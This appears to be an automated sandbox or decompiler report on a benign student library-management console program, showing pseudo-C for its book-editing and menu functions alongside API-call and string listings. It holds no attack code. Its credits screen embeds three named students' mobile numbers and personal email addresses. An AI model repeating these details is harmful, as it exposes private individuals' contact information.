                                                  				E00AD10F0((_t113 << 4) -  *0xb27f30, 0xb22be0,  &_v8);
                                                  				_t116 = _v8;
                                                  				_t70 = L00B17FF0(_v8, _t117, _t159);
                                                  				_t160 = _t70;
                                                  				if(_t70 != 0) {
                                                  					0xb27e6c->X = 0x70015;
                                                  					 *0xb27ec0 = _v8;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD1080(_t116);
                                                  					0xb27e6c->X = 0x70021;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD10F0(_t116, "%s", 0xb27ed8);
                                                  					0xb27e6c->X = 0x80015;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD1080(_t116, "Author:", "Book Name:");
                                                  					0xb27e6c->X = 0x8001e;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD10F0(_t116, "%s", 0xb27eec);
                                                  					0xb27e6c->X = 0x90015;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD1080(_t116);
                                                  					0xb27e6c->X = 0x9001f;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD10F0(_t116, 0xb22be0, 0xb27f00);
                                                  					0xb27e6c->X = 0xa0015;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD1080(_t116, "Price:", "Quantity:");
                                                  					0xb27e6c->X = 0xa001c;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD10F0(_t116, "%f", 0xb27f04);
                                                  					0xb27e6c->X = 0xb0015;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					_push("Rack No:");
                                                  					E00AD1080(_t116);
                                                  					0xb27e6c->X = 0xb001e;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD10F0(_t116, 0xb22be0, 0xb27f0c);
                                                  					return 1;
                                                  				} else {
                                                  					0xb27e6c->X = 0xd0015;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0xb27e6c);
                                                  					_push(0xb234ac);
                                                  					E00AD1080(_t116);
                                                  					E00AF4817(_t117, GetStdHandle, _t160);
                                                  					E00B1A4D0(_t109, _t116, _t117, SetConsoleCursorPosition, GetStdHandle);
                                                  					return 0;
                                                  				}
                                                  			}

                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5,74B05060,74B60170,00000000,?,?,00B1A3FE), ref: 00B1806F
                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,?,00B1A3FE), ref: 00B18078
                                                  • GetStdHandle.KERNEL32(000000F5,00B1A3FE), ref: 00B18099
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1809C
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B180BD
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B180C0
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B180E1
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B180E4
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18105
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18108
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18129
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1812C
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1814D
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18150
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18171
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18174
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18195
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18198
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B181B9
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B181BC
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B181DD
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B181E0
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18201
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18204
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18225
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18228
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18249
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1824C
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1826D
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18270
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18291
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18294
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B182B5
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B182B8
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B182D9
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B182DC
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B182FD
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18300
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18337
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1833A
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1835B
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1835E
                                                    • Part of subcall function 00B17FF0: __fread_nolock.LIBCMT ref: 00B1800D
                                                    • Part of subcall function 00B17FF0: __fread_nolock.LIBCMT ref: 00B18037
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1838F
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18392
                                                    • Part of subcall function 00B1A4D0: GetStdHandle.KERNEL32(000000F5,00000000,?,?,00B17DEB), ref: 00B1A50F
                                                    • Part of subcall function 00B1A4D0: SetConsoleCursorPosition.KERNEL32(00000000,?,?,00B17DEB), ref: 00B1A512
                                                    • Part of subcall function 00B1A4D0: GetStdHandle.KERNEL32(000000F5,?,?,?,?,00B17DEB), ref: 00B1A533
                                                    • Part of subcall function 00B1A4D0: SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,00B17DEB), ref: 00B1A536
                                                    • Part of subcall function 00B1A4D0: GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,00B17DEB), ref: 00B1A557
                                                    • Part of subcall function 00B1A4D0: SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,00B17DEB), ref: 00B1A55A
                                                    • Part of subcall function 00B1A4D0: GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,00B17DEB), ref: 00B1A57B
                                                    • Part of subcall function 00B1A4D0: SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,00B17DEB), ref: 00B1A57E
                                                    • Part of subcall function 00B1A4D0: GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A59F
                                                    • Part of subcall function 00B1A4D0: SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A5A2
                                                    • Part of subcall function 00B1A4D0: GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A5C3
                                                    • Part of subcall function 00B1A4D0: SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A5C6
                                                    • Part of subcall function 00B1A4D0: GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A5E7
                                                    • Part of subcall function 00B1A4D0: SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A5EA
                                                    • Part of subcall function 00B1A4D0: GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A60B
                                                    • Part of subcall function 00B1A4D0: SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A60E
                                                    • Part of subcall function 00B1A4D0: GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A62F
                                                    • Part of subcall function 00B1A4D0: SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A632
                                                    • Part of subcall function 00B1A4D0: GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A653
                                                    • Part of subcall function 00B1A4D0: SetConsoleCursorPosition.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00B17DEB), ref: 00B1A656
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B183CE
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B183D1
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B183F2
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B183F5
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1841B
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1841E
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1843F
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18442
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18468
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1846B
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1848C
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1848F
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B184B5
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B184B8
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B184D9
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B184DC
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18502
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18505
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18526
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18529
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ConsoleCursorHandlePosition$__fread_nolock
                                                  • String ID: Author:$Book ID:$Book Name:$Category:$Enter the Information Below$Price:$Quantity:$Rack No:
                                                  • API String ID: 2024444707-676866286
                                                  • Opcode ID: 62b3bd045547f9ad9fb0ac039b786c7af3ed876f7094c98a7eaf5f02d1fb831d
                                                  • Instruction ID: f1a33b6fa3376e9cf87cde536dbd6c97b57f9a4c22728986aec1ef4b2cbd74c9
                                                  • Opcode Fuzzy Hash: 62b3bd045547f9ad9fb0ac039b786c7af3ed876f7094c98a7eaf5f02d1fb831d
                                                  • Instruction Fuzzy Hash: 9EA1E7B288919876CA30BBE2FC0ED8A3D5CDB48768B124295F128433F1DEB55445DF76
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 79%
                                                  			E00B18580(void* __ecx, void* __edx, void* __eflags) {
                                                  				intOrPtr _v8;
                                                  				char _v12;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				void* _t6;
                                                  				void* _t17;
                                                  				void* _t23;
                                                  				void* _t28;
                                                  				void* _t29;
                                                  				void* _t67;
                                                  				void* _t69;
                                                  				void* _t70;
                                                  				void* _t72;
                                                  				void* _t73;
                                                  				intOrPtr _t74;
                                                  				void* _t75;
                                                  				void* _t77;
                                                  				void* _t80;
                                                  				void* _t85;
                                                  				void* _t104;
                                                  
                                                  				_t70 = __edx;
                                                  				_t69 = __ecx;
                                                  				_t71 = GetStdHandle;
                                                  				0xb27e6c->X = 0x40014;
                                                  				_v8 = 0;
                                                  				_t6 = GetStdHandle(0xfffffff5);
                                                  				_t68 = SetConsoleCursorPosition;
                                                  				SetConsoleCursorPosition(_t6, 0xb27e6c->X);
                                                  				E00AE3965(SetConsoleCursorPosition, _t70, GetStdHandle, _t72);
                                                  				E00AD1080(_t69, "****Edit Books Section****", "cls");
                                                  				_t77 = _t75 + 8;
                                                  				_t73 = 0xf;
                                                  				do {
                                                  					E00AE3965(_t68, _t70, _t71, _t73);
                                                  					0xb27e6c->X = 0x6000f;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD1080(_t69, "Enter Book Id to be edited:", "cls");
                                                  					E00AD10F0(_t69, 0xb22be0,  &_v12);
                                                  					 *0xb27ea0 = L00AD9D57("Bibek.dat", "rb+");
                                                  					_t17 = E00AF1525(0xb27ec0, 0x6c, 1, _t16);
                                                  					_t80 = _t77 + 0x28;
                                                  					_t102 = _t17 - 1;
                                                  					if(_t17 != 1) {
                                                  						goto L9;
                                                  					} else {
                                                  						goto L2;
                                                  					}
                                                  					do {
                                                  						L2:
                                                  						_push( *0xb27ea0);
                                                  						_t74 = _v12;
                                                  						E00AE3A34(_t70, _t102);
                                                  						_t28 = E00AF1525(0xb27ec0, 0x6c, 1,  *0xb27ea0);
                                                  						_t85 = _t80 + 0x14;
                                                  						if(_t28 != 1) {
                                                  							L6:
                                                  							_t73 = 0xf;
                                                  							if(_v8 == 0) {
                                                  								0xb27e6c->X = 0x9000f;
                                                  								SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  								_push("No record found");
                                                  								E00AD1080(_t69);
                                                  								_t85 = _t85 + 4;
                                                  							}
                                                  							goto L8;
                                                  						}
                                                  						while(1) {
                                                  							_t104 =  *0xb27ec0 - _t74; // 0x0
                                                  							if(_t104 == 0) {
                                                  								break;
                                                  							}
                                                  							_t67 = E00AF1525(0xb27ec0, 0x6c, 1,  *0xb27ea0);
                                                  							_t85 = _t85 + 0x10;
                                                  							if(_t67 == 1) {
                                                  								continue;
                                                  							}
                                                  							goto L6;
                                                  						}
                                                  						0xb27e6c->X = 0x7000f;
                                                  						_t73 = 0xf;
                                                  						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  						E00AD1080(_t69);
                                                  						0xb27e6c->X = 0x8000f;
                                                  						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  						E00AD1080(_t69, "The Book ID:%d",  *0xb27ec0);
                                                  						0xb27e6c->X = 0x9000f;
                                                  						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  						E00AD1080(_t69, "Enter new name:", "The book is availble");
                                                  						E00AD10F0(_t69, "%s", 0xb27ed8);
                                                  						0xb27e6c->X = 0xa000f;
                                                  						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  						E00AD1080(_t69);
                                                  						E00AD10F0(_t69, "%s", 0xb27eec);
                                                  						0xb27e6c->X = 0xb000f;
                                                  						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  						E00AD1080(_t69, "Enter new quantity:", "Enter new Author:");
                                                  						E00AD10F0(_t69, 0xb22be0, 0xb27f00);
                                                  						0xb27e6c->X = 0xc000f;
                                                  						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  						E00AD1080(_t69);
                                                  						E00AD10F0(_t69, "%f", 0xb27f04);
                                                  						0xb27e6c->X = 0xd000f;
                                                  						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  						E00AD1080(_t69, "Enter new rackno:", "Enter new price:");
                                                  						E00AD10F0(_t69, 0xb22be0, 0xb27f0c);
                                                  						0xb27e6c->X = 0xe000f;
                                                  						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  						_push("The record is modified");
                                                  						E00AD1080(_t69);
                                                  						E00ADA900(_t70,  *0xb27ea0, E00AD997E(_t70, __eflags,  *0xb27ea0) - 0x6c, 0);
                                                  						L00AE3D2F(0xb27ec0, 0x6c, 1,  *0xb27ea0);
                                                  						_push( *0xb27ea0);
                                                  						E00ADA516(_t69, _t70, __eflags);
                                                  						_t85 = _t85 + 0x70;
                                                  						_v8 = 1;
                                                  						L8:
                                                  						_t29 = E00AF1525(0xb27ec0, 0x6c, 1,  *0xb27ea0);
                                                  						_t80 = _t85 + 0x10;
                                                  						_t107 = _t29 - 1;
                                                  					} while (_t29 == 1);
                                                  					L9:
                                                  					0xb27e6c->X = 0x10000f;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0xb27e6c);
                                                  					_push("Modify another Record?(Y/N)");
                                                  					E00AD1080(_t69);
                                                  					E00ADA436(_t69, _t70, L00AD9E7D(0));
                                                  					_t77 = _t80 + 0xc;
                                                  					_t23 = E00AF4817(_t70, _t73, _t107);
                                                  					_t108 = _t23 - 0x79;
                                                  				} while (_t23 == 0x79);
                                                  				_push(" Press ENTER to return to main menu");
                                                  				E00AD1080(_t69);
                                                  				do {
                                                  				} while (E00AF4817(_t70, _t73, _t108) != 0xd);
                                                  				return E00B1A4D0(_t68, _t69, _t70, _t71, _t73);
                                                  			}

                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5,?,00B17DEB), ref: 00B185A8
                                                  • SetConsoleCursorPosition.KERNEL32(00000000,?,00B17DEB), ref: 00B185B1
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B185F1
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B185F4
                                                  • __fread_nolock.LIBCMT ref: 00B1862F
                                                  • __fread_nolock.LIBCMT ref: 00B18660
                                                  • __fread_nolock.LIBCMT ref: 00B1868B
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B186B5
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B186B8
                                                  • __fread_nolock.LIBCMT ref: 00B186D6
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B186F9
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B186FC
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18765
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18768
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18789
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1878C
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B187B3
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B187B6
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B187E9
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B187EC
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1881F
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18822
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B18855
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B18858
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1888B
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1888E
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B188C1
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B188C4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ConsoleCursorHandlePosition$__fread_nolock
                                                  • String ID: Press ENTER to return to main menu$****Edit Books Section****$Bibek.dat$Enter Book Id to be edited:$Enter new Author:$Enter new name:$Enter new price:$Enter new quantity:$Enter new rackno:$Modify another Record?(Y/N)$No record found$The Book ID:%d$The book is availble$The record is modified$cls$rb+
                                                  • API String ID: 2024444707-2438754467
                                                  • Opcode ID: 5ad82cb2c4b17ce7f2ca994789b198208daf2e73e0dabaf67dd7923147657702
                                                  • Instruction ID: b54bfd46435dc47e8404289d96a9c440031ef0e2a01d98dc490b90f45dde2d70
                                                  • Opcode Fuzzy Hash: 5ad82cb2c4b17ce7f2ca994789b198208daf2e73e0dabaf67dd7923147657702
                                                  • Instruction Fuzzy Hash: 6A712AB2988254BADB20B7E0BC07FAA3699DB04B18F0541D0F119123F2DEF65D548B7B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 20%
                                                  			E00B1A4D0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                  				char _v12;
                                                  				signed int _t50;
                                                  				void* _t54;
                                                  				void* _t57;
                                                  				void* _t58;
                                                  				void* _t60;
                                                  				void* _t63;
                                                  				signed int _t68;
                                                  				signed int _t69;
                                                  				void* _t70;
                                                  				void* _t84;
                                                  				signed int _t86;
                                                  
                                                  				_t58 = __edx;
                                                  				_t57 = __ecx;
                                                  				_t55 = __ebx;
                                                  				_t69 = _t68 & 0xfffffff8;
                                                  				_t86 = _t69;
                                                  				_t70 = _t69 - 0xc;
                                                  				_push(__ebx);
                                                  				_push(__esi);
                                                  				_t63 = SetConsoleCursorPosition;
                                                  				_push(__edi);
                                                  				_t60 = GetStdHandle;
                                                  				while(1) {
                                                  					E00AE3965(_t55, _t58, _t60, _t63);
                                                  					0xb27e6c->X = 0x30014;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD1080(_t57, 0xb2286c, "cls");
                                                  					0xb27e6c->X = 0x50014;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD1080(_t57);
                                                  					0xb27e6c->X = 0x70014;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD1080(_t57, 0xb228ac, 0xb22894);
                                                  					0xb27e6c->X = 0x90014;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD1080(_t57);
                                                  					0xb27e6c->X = 0xb0014;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD1080(_t57, 0xb228dc, 0xb228c4);
                                                  					0xb27e6c->X = 0xd0014;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD1080(_t57);
                                                  					0xb27e6c->X = 0xf0014;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD1080(_t57, 0xb2290c, 0xb228f4);
                                                  					0xb27e6c->X = 0x110014;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD1080(_t57);
                                                  					0xb27e6c->X = 0x130014;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AD1080(_t57, 0xb22944, 0xb22928);
                                                  					0xb27e6c->X = 0x140014;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					E00AF0952(_t57, _t58, _t86,  &_v12);
                                                  					E00AD1080(_t57, "Date and time:%s\n", E00AF102C(_t55, _t58, _t60, _t63,  &_v12));
                                                  					0xb27e6c->X = 0x150014;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					_push("Enter your choice:");
                                                  					E00AD1080(_t57);
                                                  					_t84 = _t70 + 0x3c;
                                                  					_t50 = E00AF4817(_t58, _t63, _t86) + 0xffffffcf;
                                                  					_t87 = _t50 - 6;
                                                  					if(_t50 <= 6) {
                                                  						break;
                                                  					}
                                                  					0xb27e6c->X = 0x17000a;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					_push(0xb22af0);
                                                  					E00AD1080(_t57);
                                                  					_t70 = _t84 + 4;
                                                  					_t54 = E00AF4817(_t58, _t63, _t87);
                                                  					if(_t54 != 0) {
                                                  						continue;
                                                  					} else {
                                                  						return _t54;
                                                  					}
                                                  					L15:
                                                  				}
                                                  				switch( *((intOrPtr*)(_t50 * 4 +  &M00B1A8A4))) {
                                                  					case 0:
                                                  						__eax = E00B1A230(__ecx, __edx, __eflags);
                                                  						_pop(__edi);
                                                  						_pop(__esi);
                                                  						_pop(__ebx);
                                                  						__esp = __ebp;
                                                  						_pop(__ebp);
                                                  						return __eax;
                                                  						goto L15;
                                                  					case 1:
                                                  						__eax = L00B19EE0(__ecx, __edx, __eflags);
                                                  						_pop(__edi);
                                                  						_pop(__esi);
                                                  						_pop(__ebx);
                                                  						__esp = __ebp;
                                                  						_pop(__ebp);
                                                  						return __eax;
                                                  						goto L15;
                                                  					case 2:
                                                  						__eax = E00B19650(__ecx, __edx, __eflags);
                                                  						_pop(__edi);
                                                  						_pop(__esi);
                                                  						_pop(__ebx);
                                                  						__esp = __ebp;
                                                  						_pop(__ebp);
                                                  						return __eax;
                                                  						goto L15;
                                                  					case 3:
                                                  						__eax = L00B18C00(__ecx, __edx, __eflags);
                                                  						_pop(__edi);
                                                  						_pop(__esi);
                                                  						_pop(__ebx);
                                                  						__esp = __ebp;
                                                  						_pop(__ebp);
                                                  						return __eax;
                                                  						goto L15;
                                                  					case 4:
                                                  						__eax = E00B18930(__ecx, __edx, __eflags);
                                                  						_pop(__edi);
                                                  						_pop(__esi);
                                                  						_pop(__ebx);
                                                  						__esp = __ebp;
                                                  						_pop(__ebp);
                                                  						return __eax;
                                                  						goto L15;
                                                  					case 5:
                                                  						__eax = E00B18580(__ecx, __edx, __eflags);
                                                  						_pop(__edi);
                                                  						_pop(__esi);
                                                  						_pop(__ebx);
                                                  						__esp = __ebp;
                                                  						_pop(__ebp);
                                                  						return __eax;
                                                  						goto L15;
                                                  					case 6:
                                                  						_push("cls");
                                                  						__eax = E00AE3965(__ebx, __edx, __edi, __esi);
                                                  						__esp = __esp + 4;
                                                  						0xb27e6c->X = 0x30010;
                                                  						_push(0xb27e6c->X);
                                                  						_push(0xfffffff5);
                                                  						 *__edi() =  *__esi();
                                                  						__eax = E00AD1080(__ecx, "Programmers....", __eax);
                                                  						__esp = __esp + 4;
                                                  						0xb27e6c->X = 0x40010;
                                                  						_push(0xb27e6c->X);
                                                  						_push(0xfffffff5);
                                                  						 *__edi() =  *__esi();
                                                  						__eax = E00AD1080(__ecx, "1. Bibek Subedi       (066/BCT/506)", __eax);
                                                  						__esp = __esp + 4;
                                                  						0xb27e6c->X = 0x50010;
                                                  						_push(0xb27e6c->X);
                                                  						_push(0xfffffff5);
                                                  						 *__edi() =  *__esi();
                                                  						__eax = E00AD1080(__ecx, "   Mobile:9846311430  E-mail:subedi_bibek@yahoo.co.in", __eax);
                                                  						__esp = __esp + 4;
                                                  						0xb27e6c->X = 0x70010;
                                                  						_push(0xb27e6c->X);
                                                  						_push(0xfffffff5);
                                                  						 *__edi() =  *__esi();
                                                  						__eax = E00AD1080(__ecx, "2. Dinesh Subedi      (066/BCT/512)", __eax);
                                                  						__esp = __esp + 4;
                                                  						0xb27e6c->X = 0x80010;
                                                  						_push(0xb27e6c->X);
                                                  						_push(0xfffffff5);
                                                  						 *__edi() =  *__esi();
                                                  						__eax = E00AD1080(__ecx, "   Mobile:9841569394  E-mail:smokindinesh@gmail.com", __eax);
                                                  						__esp = __esp + 4;
                                                  						0xb27e6c->X = 0xa0010;
                                                  						_push(0xb27e6c->X);
                                                  						_push(0xfffffff5);
                                                  						 *__edi() =  *__esi();
                                                  						__eax = E00AD1080(__ecx, "3. Sijan Bhandari      (066/BCT/537)", __eax);
                                                  						__esp = __esp + 4;
                                                  						0xb27e6c->X = 0xb0010;
                                                  						_push(0xb27e6c->X);
                                                  						_push(0xfffffff5);
                                                  						 *__edi() =  *__esi();
                                                  						__eax = E00AD1080(__ecx, "   Mobile:9849516774   E-mail:sijan_nasa@yahoo.com", __eax);
                                                  						__esp = __esp + 4;
                                                  						0xb27e6c->X = 0xd0010;
                                                  						_push(0xb27e6c->X);
                                                  						_push(0xfffffff5);
                                                  						 *__edi() =  *__esi();
                                                  						__eax = E00AD1080(__ecx, "With  the Unexplainable Help of Mr.Ashok Basnet", __eax);
                                                  						__esp = __esp + 4;
                                                  						0xb27e6c->X = 0x11000a;
                                                  						_push( *0xb27e6c);
                                                  						_push(0xfffffff5);
                                                  						 *__edi() =  *__esi();
                                                  						__eax = E00AD1080(__ecx, "Exiting in 3 second...........>", __eax);
                                                  						__esp = __esp + 4;
                                                  						_t5 = E00AD9A54(__edx) + 0xbb8; // 0xbb8
                                                  						__esi = _t5;
